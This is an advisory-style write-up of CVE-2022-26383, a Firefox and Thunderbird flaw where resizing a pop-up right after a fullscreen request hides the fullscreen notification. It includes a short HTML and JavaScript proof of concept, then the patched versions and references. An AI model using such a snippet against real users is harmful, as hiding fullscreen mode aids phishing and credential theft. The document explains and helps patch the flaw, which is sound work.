CVE-2022-26383 - Bypassing Fullscreen Notification in Firefox and Thunderbird by Resizing Pop-Up Windows

CVE-2022-26383 is a critical vulnerability that resides in the Firefox, Firefox ESR, and Thunderbird applications. It revolves around the pop-up window's resizing functionality and the full-screen access request. The vulnerability allows an attacker to bypass the fullscreen notification, which can lead to malicious activities such as phishing and user information theft.

Exploit Details

The vulnerability CVE-2022-26383, was discovered when security researchers observed an inconsistency related to the resizing of a pop-up window after requesting fullscreen access. Usually, any fullscreen access request invokes a notification, thus alerting the user. However, when the size of a pop-up window is altered immediately after requesting fullscreen access, the fullscreen notification is not displayed. This enables attackers to manipulate the web content shown on the entire screen without alerting the user.

Here's an example of a code snippet that demonstrates the behavior of the vulnerability

<html>
<head>
<script>
  function launchPopup() {
    var popup = window.open('', '', 'width=300,height=150');
    popup.document.write('<script>function goFullscreen() { document.documentElement.requestFullscreen(); }<\/script><button onclick="goFullscreen()">Go Fullscreen<\/button>');
    setTimeout(() => {
      popup.resizeTo(screen.availWidth, screen.availHeight);
    }, 100);
  }
</script>
</head>
<body>
  <button onclick="launchPopup()">Launch Popup</button>
</body>
</html>

In this example, when the user clicks the "Launch Popup" button, a new pop-up window is opened, containing a button titled "Go Fullscreen." By clicking this button, the pop-up window requests fullscreen access. After a short delay, the resizeTo function is called, resizing the popup window to the user's available screen size. As a result, the fullscreen notification is not displayed, and the user remains unaware that the web content is now displayed in fullscreen mode.

Mitigation

To mitigate this vulnerability, it is recommended to update your Firefox, Firefox ESR, and Thunderbird applications to their respective latest versions (Firefox 98, Firefox ESR 91.7, and Thunderbird 91.7 or newer).

- Firefox update: Visit Firefox download page to download the latest version.
- Firefox ESR update: Visit Firefox ESR download page to download the latest version.
- Thunderbird update: Visit Thunderbird download page to download the latest version.

Additionally, always exercise caution while browsing websites, and avoid clicking suspicious links that may trigger malicious pop-up windows.

Original References

- Mozilla Foundation Security Advisory
- NIST National Vulnerability Database - CVE-2022-26383

Conclusion

CVE-2022-26383 is a crucial vulnerability affecting Firefox, Firefox ESR, and Thunderbird applications. It allows threat actors to exploit the resizing of pop-up windows to bypass the fullscreen notification. Users should update their applications to the latest versions and remain cautious of suspicious web content or links to prevent potential attacks.

Timeline

Published on: 12/22/2022 20:15:00 UTC
Last modified on: 12/30/2022 15:02:00 UTC